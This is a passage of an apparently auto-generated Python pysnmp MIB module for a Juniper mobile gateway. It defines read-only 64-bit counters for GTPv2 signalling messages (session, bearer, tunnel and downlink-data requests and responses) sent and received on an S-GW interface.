jnxMbgSgwIfV2EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2EchoRespTx.setDescription('Number of GTP V2 Echo Response Sent.')
jnxMbgSgwIfV2VerNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupRx.setDescription('Number of GTP V2 Version Not supported messages received')
jnxMbgSgwIfV2VerNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfV2VerNotSupTx.setDescription('Number of GTP V2 version not supported messages sent.')
jnxMbgSgwIfCreateSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqRx.setDescription('Number of GTP V2 Create Session Requests received.')
jnxMbgSgwIfCreateSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessReqTx.setDescription('Number of GTP V2 Create Session Requests Sent.')
jnxMbgSgwIfCreateSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 27), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspRx.setDescription('Number of GTP V2 Create Session Responses received.')
jnxMbgSgwIfCreateSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCreateSessRspTx.setDescription('Number of GTP V2 Create Session Responses Sent.')
jnxMbgSgwIfModBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqRx.setDescription('Number of GTP V2 Modify Bearer Requests received.')
jnxMbgSgwIfModBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrReqTx.setDescription('Number of GTP V2 Modify Bearer Requests Sent.')
jnxMbgSgwIfModBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspRx.setDescription('Number of GTP V2 Modify Bearer Responses received.')
jnxMbgSgwIfModBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrRspTx.setDescription('Number of GTP V2 Modify Bearer Responses Sent.')
jnxMbgSgwIfDelSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqRx.setDescription('Number of GTP V2 Delete Session Requests received.')
jnxMbgSgwIfDelSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessReqTx.setDescription('Number of GTP V2 Delete Session Requests Sent.')
jnxMbgSgwIfDelSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspRx.setDescription('Number of GTP V2 Delete Session Responses received.')
jnxMbgSgwIfDelSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelSessRspTx.setDescription('Number of GTP V2 Delete Session Responses Sent.')
jnxMbgSgwIfCrtBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 37), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqRx.setDescription('Number of GTP V2 Create Bearer Requests received.')
jnxMbgSgwIfCrtBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 38), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrReqTx.setDescription('Number of GTP V2 Create Bearer Requests Sent.')
jnxMbgSgwIfCrtBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 39), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspRx.setDescription('Number of GTP V2 Create Bearer Response received.')
jnxMbgSgwIfCrtBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 40), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrtBrRspTx.setDescription('Number of GTP V2 Create Bearer Response Sent.')
jnxMbgSgwIfUpdBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 41), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqRx.setDescription('Number of GTP V2 Update Bearer Request received.')
jnxMbgSgwIfUpdBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 42), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrReqTx.setDescription('Number of GTP V2 Update Bearer Request Sent.')
jnxMbgSgwIfUpdBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 43), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspRx.setDescription('Number of GTP V2 Update Bearer Response received.')
jnxMbgSgwIfUpdBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 44), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdBrRspTx.setDescription('Number of GTP V2 Update Bearer Response Sent.')
jnxMbgSgwIfDelBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 45), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqRx.setDescription('Number of GTP V2 Delete Bearer Request received.')
jnxMbgSgwIfDelBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 46), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrReqTx.setDescription('Number of GTP V2 Delete Bearer Request Sent.')
jnxMbgSgwIfDelBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 47), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspRx.setDescription('Number of GTP V2 Delete Bearer Response received.')
jnxMbgSgwIfDelBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 48), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrRspTx.setDescription('Number of GTP V2 Delete Bearer Response Sent.')
jnxMbgSgwIfDelConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 49), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqRx.setDescription('Number of GTP V2 Delete PDN connection set Request received.')
jnxMbgSgwIfDelConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 50), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetReqTx.setDescription('Number of GTP V2 Delete PDN connection set Request Sent.')
jnxMbgSgwIfDelConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 51), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspRx.setDescription('Number of GTP V2 Delete PDN connection set Response received.')
jnxMbgSgwIfDelConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 52), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelConnSetRspTx.setDescription('Number of GTP V2 Delete PDN connection set Response Sent.')
jnxMbgSgwIfUpdConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 53), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqRx.setDescription('Number of GTP V2 Update Connection set Request received.')
jnxMbgSgwIfUpdConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 54), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetReqTx.setDescription('Number of GTP V2 Update Connection set Request Sent.')
jnxMbgSgwIfUpdConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 55), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspRx.setDescription('Number of GTP V2 Update Connection set Response received.')
jnxMbgSgwIfUpdConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 56), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfUpdConnSetRspTx.setDescription('Number of GTP V2 Update Connection set Response Sent.')
jnxMbgSgwIfModBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 57), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdRx.setDescription('Number of GTP V2 Modify Bearer Command received.')
jnxMbgSgwIfModBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 58), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrCmdTx.setDescription('Number of GTP V2 Modify Bearer Command Sent.')
jnxMbgSgwIfModBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 59), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndRx.setDescription('Number of GTP V2 Modify Bearer Failure received.')
jnxMbgSgwIfModBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 60), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfModBrFlrIndTx.setDescription('Number of GTP V2 Modify Bearer Failure Sent.')
jnxMbgSgwIfDelBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 61), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdRx.setDescription('Number of GTP V2 Delete Bearer Command received.')
jnxMbgSgwIfDelBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 62), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrCmdTx.setDescription('Number of GTP V2 Delete Bearer Command Sent.')
jnxMbgSgwIfDelBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 63), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndRx.setDescription('Number of GTP V2 Delete Bearer Failure received.')
jnxMbgSgwIfDelBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 64), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelBrFlrIndTx.setDescription('Number of GTP V2 Delete Bearer Failure Sent.')
jnxMbgSgwIfBrResCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 65), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdRx.setDescription('Number of GTP V2 Bearer Response Command received.')
jnxMbgSgwIfBrResCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 66), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResCmdTx.setDescription('Number of GTP V2 Bearer Response Command Sent.')
jnxMbgSgwIfBrResFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 67), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndRx.setDescription('Number of GTP V2 Bearer Resource Failure received.')
jnxMbgSgwIfBrResFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 68), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfBrResFlrIndTx.setDescription('Number of GTP V2 Bearer Resource Failure Sent.')
jnxMbgSgwIfRelAcsBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 69), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqRx.setDescription('Number of GTP V2 Release Access Bearer Requests received.')
jnxMbgSgwIfRelAcsBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 70), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrReqTx.setDescription('Number of GTP V2 Release Access Bearer Requests sent.')
jnxMbgSgwIfRelAcsBrRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 71), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespRx.setDescription('Number of GTP V2 Release Access Bearer Response received.')
jnxMbgSgwIfRelAcsBrRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 72), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfRelAcsBrRespTx.setDescription('Number of GTP V2 Release Access Bearer Response sent.')
jnxMbgSgwIfCrIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 73), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request Received')
jnxMbgSgwIfCrIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 74), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunReqTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request sent')
jnxMbgSgwIfCrIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 75), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response Received')
jnxMbgSgwIfCrIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 76), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfCrIndTunRespTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response sent')
jnxMbgSgwIfDelIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 77), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request Received')
jnxMbgSgwIfDelIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 78), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunReqTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request sent.')
jnxMbgSgwIfDelIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 79), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response Received')
jnxMbgSgwIfDelIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 80), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDelIndTunRespTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response sent.')
jnxMbgSgwIfDlDataNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 81), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifRx.setDescription('Number of GTP V2 Downlink Data Notify received.')
jnxMbgSgwIfDlDataNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 82), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotifTx.setDescription('Number of GTP V2 Downlink Data Notify Sent.')
jnxMbgSgwIfDlDataAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 83), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckRx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement received.')
jnxMbgSgwIfDlDataAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 84), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataAckTx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement Sent.')
jnxMbgSgwIfDlDataNotiFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 85), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndRx.setDescription('Number of GTP V2 Downlink Data Notification fail received.')
jnxMbgSgwIfDlDataNotiFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 86), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfDlDataNotiFlrIndTx.setDescription('Number of GTP V2 Downlink Data Notification fail Sent.')
jnxMbgSgwIfStopPagingIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 87), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndRx.setDescription('Number of GTP V2 Number of Stop Paging Indication Messages Received.')
jnxMbgSgwIfStopPagingIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 88), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfStopPagingIndTx.setDescription('Number of GTP V2 Number of Stop Paging Indicaton messages sent')
jnxMbgSgwIfGtpV2ICsReqAcceptRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 89), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptRx.setDescription('Number of GTPV2 packets received with cause Request Accept.')
jnxMbgSgwIfGtpV2ICsReqAcceptTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 90), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqAcceptTx.setDescription('Number of GTP packets sent with cause Request Accept.')
jnxMbgSgwIfGtpV2ICsAcceptPartRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 91), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartRx.setDescription('Number of GTPV2 packets received with cause Accept Partial.')
jnxMbgSgwIfGtpV2ICsAcceptPartTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 92), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAcceptPartTx.setDescription('Number of GTP packets sent with cause Accept Partial.')
jnxMbgSgwIfGtpV2ICsNewPTNPrefRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 93), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Network Preference.')
jnxMbgSgwIfGtpV2ICsNewPTNPrefTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 94), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNewPTNPrefTx.setDescription('Number of GTP packets sent with cause New PDN type due to Network Preference')
jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 95), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx.setStatus('current')
